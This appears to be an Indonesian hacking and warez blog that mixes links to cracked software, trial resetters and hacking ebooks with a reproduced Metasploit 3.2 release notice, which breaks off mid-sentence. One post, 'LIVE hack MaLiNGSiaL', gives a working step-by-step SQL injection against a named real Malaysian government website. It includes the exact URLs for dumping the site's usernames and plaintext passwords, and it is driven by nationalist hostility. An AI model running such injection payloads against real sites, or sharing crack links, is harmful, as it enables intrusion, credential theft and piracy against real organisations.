This is default featured post 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Tampilkan postingan dengan label Security Internet. Tampilkan semua postingan
Tampilkan postingan dengan label Security Internet. Tampilkan semua postingan

Rabu, Juni 17, 2009

Details for hacking windows exposed - Free Ebook

WHAT IS INSIDE:

1 Information Security Basics
2 The Windows Security Architecture from
the Hacker’s Perspective
3 Footprinting and Scanning
4 Enumeration
5 Hacking Windows-Specif ic Services
6 Discovering and Exploiting Windows Vulnerabilities
7 Post-Exploit Pillaging
8 Achieving Stealth and Maintaining Presence
9 Hacking SQL Server
10 Hacking Microsoft Client Apps
11 Physical Attacks
12 Windows Security Features and Tools

Code:
http://rapidshare.com/files/245452744/hacking_windows_exposed.pdf

Selasa, Juni 16, 2009

IP Hider 4.2 - Giveaway (Proxy Changer)

IP Hider is an application software utility to hide and mask real IP address when surfing the Internet from AllAnonymity.com. By hiding or masking the actual IP address, user can greatly increase the privacy protection and anonymity capability when browsing World Wide Web, which full of marketing tools which monitor surfing habits or exploits that attempt to attack or hack the computer.

What IP Hider actually does is by redirecting and routing the Internet traffic through anonymous proxies. Most web browsers including Internet Explorer, Firefox, Safari and Google Chrome allows user to set a proxy server to use. However, manually changing the proxy server in the browser’s option or preference is cumbersome. IP Hider makes the using of proxy with any web browser easier, by effectively creating a local proxy server (localhost or 127.0.0.1) at port 8080, which can be configured for once on web browser, or even automatically set by IP Hider. Then, user select a proxy server to use to browser the Internet through IP Hider user interface (UI), which include a comprehensive proxy list, containing proxies from various countries.

Image

Code:
http://rapidshare.com/files/242462986/iphider.exe



CRACK - NOT TESTED
Code:
http://rapidshare.com/files/126458327/IP-Hider.rar


WORKING PATCH

Code:
http://rapidshare.com/files/27007059/IP_Hider___crack.rar

pass - www.dirtyspacewarez.com

Selasa, Juni 09, 2009

Hacking Tutorials NEW 2009 + Collection > 700



Hacking Tutorials NEW 2009 (Collection >700)

1. How to rip Dynamic Flash Template.txt
2. 10 reasons why PCs crash U must Know.txt
3. 10 Security Enhancements.txt
4. 16x Dvd+-rw Dl Dvd Writer Comparison Guide.txt
5. 20 Great Google Secrets.txt
6. 23 Ways To Speed WinXP, Not only Defrag.txt
7. 250+ Tech books online.txt
8. 2600 Hertz Single Tone Generator Schematic.txt
9. 36 Graphics & Design Ebooks.txt
10. 8 People Can Use The Same Msn Dial Up Account.txt
11. A Basic Guide to the Internet.txt
12. A Basic UNIX Overview.rtf
13. A BEGINNERS GUIDE TO Hacking Unix.txt
14. A Cracking Tutorial
15. A Guide to Internet Security- Becoming an Uebercracker.txt
16. A Guide to the Easiest Hacking there is.txt
17. A List of every TeleNet code that there is.txt
18. A List Of Government BBS Numbers.txt
19. A List Of Some OF The Most Useful UNIX Hacking Commands.htm
20. A Novice's Guide to Hacking 2004.txt
21. A Novice's Guide To Hacking.txt
22. A Short HACKER SPEAK Glossary.txt
23. A simple TCP spoofing attack.txt
24. A Small Guide to Hacking HOTMAIL.txt
25. A UNIX Hacking Tutorial.txt
26. A very small tut for RealMedia.txt
27. A Web Standards Checklist, How to make a proper website.txt
28. Accessing the bindery files directly.txt
29. Accessing The Entire Internet On Your 3 Phone, U8110, E616 etc..txt
30. Advanced Shellcoding Techniques.txt
31. All about ftp must read.txt
32. All About Movie Tags (what Is A Dvdrip, Cam Etc.).txt
33. ALL About Spyware.txt
34. All mIRC Commands.txt
35. Almost Everything You Ever Wanted To Know About Security (but.txt
36. An Architectural Overview of UNIX Network Security.htm
37. An Extensive Guide to Bell System Man Holes.txt
38. An Indepth Guide in Hacking UNIX and the concept of Basic Net.txt
39. An Introduction into TeleScan.txt
40. An Introduction to Denial of Service.txt
41. An Introduction to the Computer Underground.txt
42. An Introductory Guide To TeleNet Commands.txt
43. Anarchist Cookbook 2004
44. Anonymity complete GUIDE.rtf
45. Anonymity of Proxy, Anonymity Of Proxy learn it insideout.txt
46. Anonymity.txt
47. ANONYMOUS emails.txt
48. Anonymous FTP FAQ.htm
49. ANSIBombs II Tips And Techniques.txt
50. anti leech hacking tutorial.txt
51. Area Codes and Time Zones.txt
52. attacks on networks how to stop.htm
53. Auto End Tasks to Enable a Proper Shutdown, Win XP Tweak.txt
54. Automatic Windows Installation, No keypress required!.txt
55. B.A. regedit.txt
56. Backdoor.txt
57. Backdoors.txt
58. Backtracking EMAIL Messages.txt
59. Bandwidth Explained!.txt
60. Basic Networking.txt
61. BBS CRASHING TECHNIQUES.txt
62. Becoming A Phreaker - The Quick n' Easy Way.txt
63. Beep Code Manual.txt
64. Beep Codes Error Codes.txt
65. Bell Hell Volume #1.txt
66. Bell Hell Volume #2.txt
67. Best Keyboard Shortcuts.txt
68. Big Brother And Ndisuio.sys, A new Internet phenomenon.txt
69. Bin & Cue Simple Tut.txt
70. BIOS Update Procedure.txt
71. Bit Torrent Tutorials.txt
72. Block Adservers.txt
73. Boot Block Recovery For Free.txt
74. Boot Winxp Fast.txt
75. Border And Text Effects In Psp8, For use with PSP8.txt
76. Breaker B0X.txt
77. Broken Ie, How to fix it.txt
78. BRUTE- A brute force approach to hacking Unix passwords.txt
79. Bulk Editing Of .xxx to .zip or .mp3.txt
80. BulletProof FTP Server Tutorial.txt
81. Burn .bin file Without A .cue file.txt
82. Burn a BIN without a CUE using NERO.txt
83. Burning Bin & Cue Using Nero.txt
84. Bust Avoidance For Dipshits.txt
85. busybox.txt
86. Bypass Internet Censorship.txt
87. Calculating Offsets.txt
88. cannot use my password to get back into Windows XP.txt
89. Cant See Secure Sites.txt
90. Caught A Virus.txt
91. Cellular Listening with a TV .txt
92. Cellular Telephone Phreaking Phile Series VOL 1.txt
93. Change Music In The Malibu And The Pole Position, GTA Vice Modders.txt
94. Change Text on XP Start Button.rtf
95. Change Text on XP Start Button.txt
96. Change The Default Location For Installing Apps.txt
97. Change The Storage Location Of 'my Documents', a bit safer for when your PC crashes....txt
98. Change Your Ip In Less Then 1 Minute.txt
99. Changing Default Location For Installing Apps.txt
100. Check For Dos, Check to see if you are infected..txt
101. Choosing A Good Domain Name, ya..good name is important!.txt
102. Choosing An Internet Merchant Account, nice info on Internet Merchant Account...txt
103. Clear Unwanted Items From Add And Remove.txt
104. Closing Open Holes, System Security How to close open holes.txt
105. Closing the Net.txt
106. CMD Prompt here, add to folder context menu windows xp.txt
107. COMMON FTP ERROR CODES.txt
108. Compression and Cracks for Dummies.txt
109. Computer Acronyms.txt
110. Computer Bulliten Boards and the Law.txt
111. Computer Chrime - Current Practices, Problems and Proposed So.txt
112. Computer eMail and Privacy.txt
113. Computer Hackers News Articles.txt
114. Computer Matinence.txt
115. Computer Rights vs First and Forth Amentment Right.txt
116. Computer Security.txt
117. Computer Security_2.txt
118. Computer Viruii.txt
119. Computerized Governmental Database Systems Containing Persona.txt
120. Configuring ZoneAlarm Pro Security Settings, A ZoneAlarm Pro Tutorial.txt
121. connect A Psx Pad To Pc, Warning soldering is involved...txt
122. Convert Stubborn Webpage To pdf.txt
123. Convert To Basic And Dynamic Disks In Windows Xp.txt
124. Converting Movies To Psp Format.txt
125. Converting to NTFS.txt
126. COPS and Robbers-Unix System Security.txt
127. COPY X BOX GAMES!.txt
128. Copyright Guides for Photographers.txt
129. Cracking Bios, use the followin' code.txt
130. Cracking Zip Password Files.txt
131. Crap Software Config Settings, How to set-up the firewall.txt
132. Crash Course in X Windows Security.txt
133. Create A Huge File.txt
134. Create A Personal Screen Saver In Win Xp!.txt
135. Create An Ftp Server On Your Pc With Serv-u.txt
136. Create Bootable Win XP SP1 CD(nero).txt
137. Create Bootable XP SP integrated CD.txt
138. Create One-click Shutdown And Reboot Shortcuts.txt
139. Creating a Board aka Forum on your own PC !.rtf
140. Creating Universal Ghost Usb Boot Disk And Cd.txt
141. Crime and Puzzlement.txt
142. Cultural Formations in Text-Based Virtual Realties.txt
143. Cyberspace and the Legal Matrix- Laws or Confusion.txt
144. Dark Angel's Phunky Virus Writing Guide .txt
145. Data Capacity of CDs [Tutorial].txt
146. Debug, Learn how ***** windows.txt
147. Defamation Liability of Computerized Bulliten Board Operators.txt
148. Delete An undeletable File.txt
149. Delete Files From The Recent File List In Windows.txt
150. Dept of Treasury Letter.txt
151. Digital Camera Guide.txt
152. Digital Faq -learn Everything About Digital, Capture, Edit and Burning and more.txt
153. Digital Photo Id Cards, Greate Info.txt
154. Direct Link To Any Page You Want To In Hotmail.txt
155. Directx Explained.txt
156. Disable Compression On Xp, NTFS partition, Disk Cleanup.txt
157. Disable The Send Error Report, to Microsoft.txt
158. Disable Windows Logo Key.txt
159. Discover New Music You'll Probably Love.txt
160. Do You Want To Learn Maya 6, look, some tutorials.txt
161. Doom 3 Speed Up, Guaranteed 40% better.txt
162. Doom3 Simple Tweeks, how to run doom with tweeks.txt
163. Dos User - No Boot Dos Disk, No Edit.com,How to create Imp Files.txt
164. Download Free Music legally,, legally.txt
165. Download from a paypal site without paying a penny!.txt
166. Download From Ftpz, Using Ftp Search Sitez.txt
167. Download Mp3's Without Using Filesharing.txt
168. Download Music And Video With ,edia Player9, quick and easy!.txt
169. Download Timeframes.txt
170. Downloading Files, Using Archives And Images.txt
171. Downloading Windows Media Streams.txt
172. Drake's Phreaking Tutorial.txt
173. Dreamweaver Tut That Teaches U, to search a database with phpmysql.txt
174. Driverguide.com.txt
175. Dual Boot After The Fact.txt
176. Dvd Copying-ripping Definitions.txt
177. DVD Regions Information.txt
178. Dvd-9 to Dvd+r Dl, Double Layer To Double Layer, 1-1 copies.txt
179. Easily Disconnect-reconnect From Broadband.txt
180. Easily Find Serial Numbers On Google.., easy to do and works like a charm..txt
181. Ebay Hackcracktip.txt
182. Electronic Bulliten Boards and 'Public Goods' Explainations o.txt
183. Electropolos - Communication and Comunity on IRC.txt
184. Eliminate Ie's Autocomplete Reminder.txt
185. Email Forge, sends email from anyone.txt
186. Enable Folder and Icon Refresh, Win XP Tweak.txt
187. Erasing_Your_Presence_From_System_Logs.txt
188. Ethload User's Guide.txt
189. Evolution Of Computer Viruses History Of Viruses.txt
190. Excellent tricks and techniques of Google Hacks.txt
191. Exploseek, a simple tool to find music on the net.txt
192. Find Stuff.txt
193. Finding Missing Files From A Release.txt
194. Firefox Speed Tweaks.txt
195. Firefox Tweaks.txt
196. Firewall Protection how to.rtf
197. FlashFXP FAQ.txt
198. Flashget Broadband Tweak.txt
199. FLASHGET INTEGRATION IN OPERA,MOZILLA,NETSCAPE.txt
200. FlashGet v1.4 - More Download Simultaneously.txt
201. Flashing A Video Card Bios [advanced Guide], Step-by-Step Guide for Novice and Expert.txt
202. Formatting An Hdd, when fdisk won't.txt
203. Formulating A Company Policy on Access to and Use and Disclos.txt
204. Free Access To Websites Without Registering.txt
205. FREE Hosting For WAREZ.txt
206. FREE Hosting List php, mysql and more.txt
207. Free Speech in Cyberspace.txt
208. Free World Dialup.txt
209. Free X-box Live !.txt
210. Freebsd Install Guide.txt
211. Gender Issues in Online Communications.txt
212. General Keyboard Shortcuts, General Keyboard Shortcuts.txt
213. Get In Windows 2000 As Administrator.txt
214. Get the Most Out of Your DVD Recorder.txt
215. Get The Music You Want To Hear.txt
216. Get unlimited bandwidth from your host for free.txt
217. Getting A 1gb Yahoo China Account.txt
218. Getting Counter-strike Source To Work.txt
219. getting movies, mp3,games using google.txt
220. Getting older programs to run on Windows XP.txt
221. Getting started with Linux for nOObs!.txt
222. Go to Windows updates anonymously.txt
223. Google ***** Search.txt
224. Google secrets.txt
225. Google Tips & Tricks, (utilizing search engine).txt
226. Government Computer Security Techniques.txt
227. Graffiti On Walls 4 Adobe Photoshop Cs 8.0.txt
228. Guide For Getting Free Stuff.txt
229. Guide to Hacking with sub7.doc
230. Guide to IIS Exploitation.txt
231. Guide to Slipstreaming Service Pack 2.txt
232. HACKDICT.TXT
233. Hacker Test.txt
234. Hackers A-Z.TXT
235. Hackers Who Break into Computer Systems.txt
236. hacking and phreaking.doc
237. Hacking Bank Of America's Home Banking System.txt
238. Hacking Compuserve Infomation Service.txt
239. Hacking Faq.txt
240. Hacking for Dummies Volume 2.doc
241. Hacking For Newbies.doc
242. Hacking GTE Telemail.txt
243. hacking in telnet ftp.rtf
244. Hacking IRC - The Definitive Guide.txt
245. hacking on Telnet explained.doc
246. hacking on XP part 1.doc
247. hacking on XP part 2.doc
248. hacking on XP part 3.doc
249. hacking on XP part 4.doc
250. hacking on XP part 5.doc
251. hacking password protected site.doc
252. Hacking Password Protected Website's.doc
253. hacking passwords.doc
254. Hacking PC-Pursuit Codes.txt
255. Hacking Techniques.txt
256. Hacking TRW.txt
257. Hacking TYMNET.txt
258. Hacking Unix System V's.txt
259. Hacking VoiceMail Systems.txt
260. Hacking Wal-Mart Computers.txt
261. Hacking Webpages.txt
262. Hard drive Gone Bad.txt
263. Hardware Firewall.txt
264. Have Notepad In Send To.txt
265. have satallite tv for almost free IF not free!!!.txt
266. Hex, How to turn binary or decimal to hex.txt
267. Hide Drives and Partitions.txt
268. How 2 Find EVERYTHING uploaded on Rapidshare.txt
269. How BT phone cards works.txt
270. How do I overburn a CD with Nero.txt
271. How do I remove an extra operating system from by.txt
272. How do I Test My VirusScan Installation.txt
273. How Do U See Hidden Files, Using DOS...txt
274. How Download MP3s from Fanscape.com or other Streaming Audio-Video.txt
275. How Linux boots.txt
276. How Long Has Your XP System Been Running.txt
277. How Phone Phreaks are Caught.txt
278. How the Traditional Media Clasifications Fail to Protect in t.txt
279. How To Access Your Folders From Your Taskbar.txt
280. How To Add A Url Address Bar To The Taskbar.txt
281. How To Add An Option To Print, the Contents of a Folder!.txt
282. How To Add Your Own Windows Tips.txt
283. How to Back Up the Registry.txt
284. How To Backup Ps2 Games.txt
285. How to Bill All Of your Fone Calls To Some Poor, Unsuspecting.txt
286. HOW TO BLOCK PEOPLE ON WINMX WHO SHARE NOTHING.txt
287. How To Block Websties Without Software, block websites.txt
288. How To Boot Xp Faster (updated).txt
And More...

Download
Code:
Hotfile
http://hotfile.com/dl/5069875/df0a60c/Hking_Tuts.rar.html

Uploading
http://www.uploading.com/files/0OUURX21/Hking_Tuts.rar.html

Easy-share
http://www.easy-share.com/1905531794/Hking_Tuts.rar

Acunetix Web Vulnerability Scanner Enterprise 6.0


Quote:
Audit your website security with Web Vulnerability Scanner. Website security is possibly today's most overlooked aspect of securing the enterprise and should be a priority in any organization. Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Web applications are accessible 24 hours a day, 7 days a week and control valuable data since they often have direct access to backend data such as customer databases.

Firewalls, SSL and locked-down servers are futile against web application hacking. Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications are often tailor-made therefore tested less than off-the-shelf software and are more likely to have undiscovered vulnerabilities. Acunetix WVS automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities. Acunetix Web Vulnerability Scanner (WVS) is an automated web application security testing tool that audits your web applications by checking for exploitable hacking vulnerabilities. Automated scans may be supplemented and cross-checked with the variety of manual tools to allow for comprehensive web site and web application penetration testing.

Code:
http://rapidshare.com/files/242003316/Acunetix.Web.Vulnerability.Scanner.Enterprise.6.0.Ful

Kamis, Mei 21, 2009

Demystifying Google Hacks - Information + Download



Info:
Google is worlds most popular and powerful search engine which has the ability to accept pre defined commands as inputs and produce unbelievable results. This enables malicious users like hackers, crackers, and script kiddies etc to use Google search engine extensively to gather confidential or sensitive information which are not visible through common searches. In this paper I shall cover the below given points that an administrators or security professionals must take into account to prevent such information disclosures:
- Googles Advance Search Query Syntaxes
- Querying for vulnerable sites or servers using Googles advance syntaxes
- Securing servers or sites from Googles invasion

WARNING i hold no responsibility for what you do via the information supplied here...this is for educational purpose only , use at your own risk you have been warned

Download link:
Code:
http://www.uploading.com/files/6GD7VGJY/Demystifying_Google_Hacks.rar.html

SQL HACKS - Tips & Tools for Digging into Your Data (NEW - With Source Code)


SQL Hacks - Tips & Tools for Digging into Your Data (NEW - With Source Code)

Andrew Cumming, Gordon Russell "SQL Hacks - Tips & Tools for Digging into Your Data (With Source Code)"
November 2006 | English | ISBN-13: 978-0-596-52799-0 | 304 Pages | CHM | 7.60 MB


Whether you're running Access, MySQL, SQL Server, Oracle, or PostgreSQL, this book will help you push the limits of traditional SQL to squeeze data effectively from your database. The book offers 100 hacks -- unique tips and tools -- that bring you the knowledge of experts who apply what they know in the real world to help you take full advantage of the expressive power of SQL. You'll find practical techniques to address complex data manipulation problems. Learn how to:

* Wrangle data in the most efficient way possible
* Aggregate and organize your data for meaningful and accurate reporting
* Make the most of subqueries, joins, and unions
* Stay on top of the performance of your queries and the server that runs them
* Avoid common SQL security pitfalls, including the dreaded SQL injection attack

Let SQL Hacks serve as your toolbox for digging up and manipulating data. If you love to tinker and optimize, SQL is the perfect technology and SQL Hacks is the must-have book for you.

Download

Code:
Uploading
http://uploading.com/files/QI0LN4I2/SQL_Hacks_-_Tips___Tools_for_Digging_into_Your_Data__NEW_-_With_Source_Code.rar.html

Easy-share
http://www.easy-share.com/1905288718/SQL_Hacks_-_Tips___Tools_for_Digging_into_Your_Data__NEW_-_With_Source_Code.rar

Hotfile
http://hotfile.com/dl/3259851/352a079/SQL_Hacks_-_Tips___Tools_for_Digging_into_Your_Data__NEW_

Rabu, Mei 06, 2009

ETHERNET CARD FOR THE HYDRA SYSTEM

The Hydra EtherX is an Ethernet card designed to interface to the Hydra system via the expansion port. The card is built around Wiznet’s W5100 hardwired TCP/IP Ethernet chip and interfaces to the Hydra using SPI.
The Hydra allows designers to develop games, graphics, and media applications with the Propeller-powered game console. The Hydra EtherX card comes with a complete eBook describing how the sample EtherX card driver works from the ground up.
The manual covers SPI, Ethernet, and Internet protocols (IP, TCP, and UDP). With this knowledge, designers will be able to write their own drivers for the W5100 or expand on the previously written sample driver. The driver includes an easy-to-use API with source code, examples, tutorials, and detailed explanations. You can use the EtherX card to turn the Hydra into a web server, access a file server, or play games over the Internet.

The Hydra EtherX Card costs $59.99.
The Hydra Game Development kit costs

$199.99.
Parallax, Inc.
www.parallax.com

Senin, Mei 04, 2009

Kaspersky All Products Trial Resetter 1.8 tested



Kaspersky All Products Trial Resetter 1.8

The program includes support for the follwing Kaspersky products:

Kaspersky Anti-Virus Version 2009 (8.0.0.506)
Kaspersky Anti-Virus Version 2009 (8.0.0.454)
Kaspersky Anti-Virus Version 2009 (8.0.0.357)
Kaspersky Anti-Virus Version 7.0.1.325
Kaspersky Anti-Virus Version 7.0.0.125
Kaspersky Anti-Virus Version 6.0.2.621
Kaspersky Anti-Virus Version 6.0.2.614
Kaspersky Anti-Virus Version 6.0.1.411
Kaspersky Anti-Virus Version 6.0.0.303

Kaspersky Internet Security Version 2009 (8.0.0.506)
Kaspersky Internet Security Version 2009 (8.0.0.454)
Kaspersky Internet Security Version 2009 (8.0.0.357)
Kaspersky Internet Security Version 7.0.1.325
Kaspersky Internet Security Version 7.0.0.125
Kaspersky Internet Security Version 6.0.2.621
Kaspersky Internet Security Version 6.0.2.614
Kaspersky Internet Security Version 6.0.1.411
Kaspersky Internet Security Version 6.0.0.303

Read : How to use !!!

DOWNLOAD

Anti-Hacker Tool Kit - Hacking Exposed


Anti-Hacker Tool Kit

Mount a comprehensive, proactive defense against the most sinister cyber-criminals using the tricks and techniques contained in this unique resource. Fully updated to include the latest weapons in the security experts:
arsenal, Anti-Hacker Tool Kit, Third Edition provides all the information you'll need to lock down your network from the ground up. Logically organized by category, each tool's function, installation, and configuration is fully described, alongside screenshots and code examples. Brand-new examples and in-depth case studies detail how to implement each vital tool in real-world situations..

Explains how to configure and use these and other key tools:

MULTIFUNCTIONAL UTILITIES: Netcat, Cryptcat, Sbd.
PORT SCANNERS: Nmap, THC-Amap,IPEye.
EMULATORS: VMware, Virtual PC, Gnoppix, Cygwin.
ENUMERATORS: Samba, Winfingerprint, PsTools, HFNetChk.
WEB HACKING APPLICATIONS: Nikto, LibWhisker, Paros, Burp.
PASSWORD CRACKERS AND BRUTE-FORCE TOOLS: John the Ripper, LophtCrack, THC-Hydra, PwDump.
WAR DIALERS: ToneLoc, THC-Scan.
HOST HARDENING APPLICATIONS: Clamav, Titan, Msec.
BACKDOORS AND REMOTE ACCESS: VNC, Netbus, Back Orifice, SubSeven, Loki, Knark.
AUDITING TOOLS: Flawfinder, RATS, Nessus, STAT, Tripwire.
PORT REDIRECTERS: Datapipe, FPipe, WinRelay.
SNIFFERS: BUTTSniffer, WinDump, Ethereal, Dsniff, Snort.
WIRELESS TOOLS: NetSlumber, TCPsic, ICMpsic, Iptest.
FORENSIC UTILITIES: dd, EnCase, Sleuth Kit, Vnode, WinHex

DOWNLOAD

Sabtu, April 18, 2009

Makni Banyak Pembobolan Yang Dilakukan Para Cracker

Kiprah cracker layaknya jamur. Semakin merajalela dan ada di mana-mana. Nah, dari sekian banyak yang dirambah, apa yang sebenarnya paling mereka minati karena dianggap paling menggiurkan?

Sebuah laporan tahunan terbaru dikeluarkan oleh Verizon Business, sebuah perusahaan layanan teknologi dan komunikasi yang berbasis di Amerika. Penulis menyebutkan bahwa jumlah data yang telah dibobol oleh para cracker naik hingga mencapai 285 juta.

Angka pembobolan tersebut diketahui didominasi oleh aksi yang terjadi di bank-bank dan layanan finansial lainnya. Dan dari maraknya pembobolan bank yang dilakukan para cracker, sebanyak 81% diantaranya mengincar data-data dari kartu pembayaran, terutama kartu debit.

Mereka mengerahkan tenaga dan pikirannya untuk bisa masuk dan mengakses data-data seperti nomor PIN. Dalam kasus ini, pembobolan data kartu debit dianggap lebih menggiurkan dibandingkan kartu kredit.

Hal ini disebabkan karena dengan detail-detail yang terdapat dalam kartu debit (debit card): nomor kartu, informasi yang terkandung dalam garis-garis magnet, serta PIN, mereka bisa menarik uang secara langsung. Berbeda dengan kartu kredit yang mengharuskan mereka melakukan pembelian terlebih dulu dan mentransfernya dalam bentuk cash.

Dengan laporan yang dikeluarkan Verizon Business di atas, diharapkan beberapa pihak untuk lebih waspada, terutama bagi perusahaan finansial dan pemilik kartu pembayaran. Pihak Verizon juga menyarankan para administrator TI untuk menjaga data-data pribadi para user dengan super hati-hati.

Rabu, Januari 07, 2009

LIVE hack MaLiNGSiaL

http://anti-indon-area.blogspot.com kita lagi konsen ma israel.. dia malah nyerang.. wah.. emang tuch.. kelakuannya mirip ama israel dan sekutu US tuch.. malingsial!!

Engk ada malu-malunya .... !! Bukannya support palestine(berduka) .... !!

Sekedar memsupport rekan-rekan sepropesi ... !! berikut saya buat secara live(siaran langsung SQL Inject ke Malingsial), memang mudah sich, tetapi buat belajar masih oke ..... !! BRAVO.

http://www.halal.gov.my << ada bug sql ... ini salah satunya yang passwordnya tidak di hash

Langkah 1 Cari dan buktikan
http://www.halal.gov.my/corporate.php?ID=116+AND+1 << ini ada news
http://www.halal.gov.my/corporate.php?ID=116+AND+1' << kalau kita beri tanda ['] << kutip maka error ... nah ini yang di sebut SQL Injection BUG

langkah 2 Gunakan metode SQL Injection ke target
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 order by 1 << ada kesalahan sql tidak ... ternyata tidak ... lanjut ke
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 order by 2 << tidak ada error
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 order by 3 << no error
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 order by 4 << sama jg
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 order by 5 << ini jg tidak ada error
jangan putus asa .... !!
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 order by 10 << NAH ini ada ERROR
cukup disini .. kita lihat 1-9 tidak terjadi error .... berarti ada 9 colom.

Langkah 3 Pastikan kita bisa masuk ke target
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 union all select 1,2,3,4,5,6,7,8,9-- << kita lihat kolom berapa kita bisa lanjutkan SQL Injection berikutnya.
BRAVO colom ke-2 ternyata bisa kita isi Inject.
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2 union all select 1,version(),3,4,5,6,7,8,9-- << MYSQL ver 5.0.45

Langkah 4 Lihat DataBase target
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2+union all select+1,table_name,3,4,5,6,7,8,9 from information_schema.tables-- << Lihat Data TABLE
Wow ada yang menarik dari TABLE target yaitu table tbluser << catat di notepad
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2+union all select+1,column_name,3,4,5,6,7,8,9 from information_schema.columns-- << Lihat Data semua Columns
Disini kita dapat lihat kembali apa yang menarik dari columns yaitu
columns fldusername,fldpassword << dari table tbluser

Langkah 5 Hasil SQL Inject
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2+union all select+1,fldusername,3,4,5,6,7,8,9 from tbluser-- << Isi Table tbluser & column fldusername
http://www.halal.gov.my/corporate.php?ID=116+AND+1=2+union all select+1,fldpassword,3,4,5,6,7,8,9 from tbluser-- << Isi Table tbluser & column fldpassword

Kesimpulan:
Cukup disini anda dapat mengumpulkan Login dan Password dari situs target
berikutnya terserah anda .... dan berkreasilah .... !!

Notes:
Penulis TIDAK bertanggung jawab atas penggunaan maupun penyalahgunaan dari artikel ini.
Tujuan dibuat artikel HANYA untuk BAHAN PEMBELAJARAN saja.
Bila pembaca artikel ini menganggap artikel ini menyinggung perasaan, maka Penulis
memohon maaf sebesar-besarnya.

Selasa, Desember 30, 2008

ROY SURYO NGAMUK NIH

Setelah menjadi pembicaraan di forum bahkan di news echo
bapak kita ini mengamuk " Mudah - mudahan ga kelewatan nanti die tewas gantung diri lagi"

http://www.geocities.com/ratc_noid/ICC-CENTER.gif
http://www.geocities.com/ratc_noid/indonesiaweb.gif
http://www.geocities.com/ratc_noid/karyasuccse.gif
http://www.geocities.com/ratc_noid/nurcholis.gif

Liat aja kata kata nya hehhehe

Ya biarkan saja lah dia seperti itu menjadi pakar dan menyobongkan dirinya toh yang dia tudah itu salah ahaha moga - moga tidak ada lagi orang orang sperti dia hanya mengumbar omongann

ok keep smile and anonymouse

Senin, Desember 15, 2008

Metasploit Framework 3.2 Released

888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888


Contact: H D Moore FOR IMMEDIATE RELEASE
Email: hdm[at]metasploit.com


Austin, Texas, November 19th, 2008 -- The Metasploit Project
announced today the free, world-wide availability of version 3.2 of
their exploit development and attack framework. The latest version
is provided under a true open source software license (BSD) and is
backed by a community-based development team.

Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used
on a wide range of hardware platforms, from massive Unix mainframes to
the iPhone. Users can access Metasploit using the tab-completing console
interface, the Gtk GUI, the command line scripting interface, or the
AJAX-enabled web interface. The Windows version of Metasploit includes
all software dependencies and a selection of useful networking tools.

The latest version of the Metasploit Framework, as well as screen
shots, video demonstrations, documentation and installation
instructions for many platforms, can be found online at


- http://metasploit.com/framework/


This release includes a significant number of new features and
capabilities, many of which are highlighted below.

Version 3.2 includes exploit modules for recent Microsoft flaws, such
as MS08-041, MS08-053, MS08-059, MS08-067, MS08-068, and many more.

The module format has been changed in version 3.2. The new format
removes the previous naming and location restrictions and paved the way
to an improved module loading and caching backend. For users, this means
being able to copy a module into nearly any subdirectory and be able to
immediately use it without edits.

The Byakugan WinDBG extension developed by Pusscat has been integrated
with this release, enabling exploit developers to quickly exploit new
vulnerabilities using the best Win32 debugger available today.

The Context-Map payload encoding system development by I)ruid is now
enabled in this release, allowing for any chunk of known process memory to
be used as an encoding key for Windows payloads.

The Incognito token manipulation toolkit, written by Luke Jennings, has
been integrated as a Meterpreter module. This allows an attacker to gain
new privleges through token hopping. The most common use is to hijack
domain admin credentials once remote system access is obtained.

The PcapRub, Scruby, and Packetfu libraries have all been linked into
the Metasploit source tree, allowing easy packet injection and capture.

The METASM pure-Ruby assembler, written by Yoann Guillot and Julien
Tinnes, has gone through a series of updates. The latest version has been
integrated with Metasploit and now supports MIPS assembly and the ability
to compile C code.

The Windows payload stagers have been updated to support targets with
NX CPU support. These stagers now allocate a read/write/exec segment of
memory for all payload downloads and execution.

Executables which have been generated by msfpayload or msfencode now
support NX CPUs. The generated executable is now smaller and more
reliable, opening the door to a wider range of uses. The psexec and
smb_relay modules now use an executable template thats acts like a real
Windows service, improving the reliability and cleanup requirements of
these modules.

The Reflective DLL Injection technique pioneered by Stephen Fewer of
Harmony Security has been integrated into the framework. The new payloads
use the "reflectivedllinjection" stager prefix and share the same binaries
as the older DLL injection method.

Client-side browser exploits now benefit from a set of new javascript
obfuscation techniques developed by Egypt. This improvement leads to a
greater degree of anti-virus bypass for client-side exploits.

Metasploit contains dozens of exploit modules for web browsers and
third-party plugins. The new browser_autopwn module ties many of these
together with advanced fingerprinting techniques to deliver more shells
than most pen-testers know what to do with.

This release includes a set of man-in-the-middle, authentication relay,
and authentication capture modules. These modules can be integrated with
a fake proxy (WPAD), a malicious access point (Karmetasploit), or basic
network traffic interception to gain access to client machines. These
modules tie together browser_autopwn, SMB relaying, and HTTP credential
and form capturing to pillage data from client systems.

Nearly all Metasploit modules now support IPv6 transports. IPv6 stagers
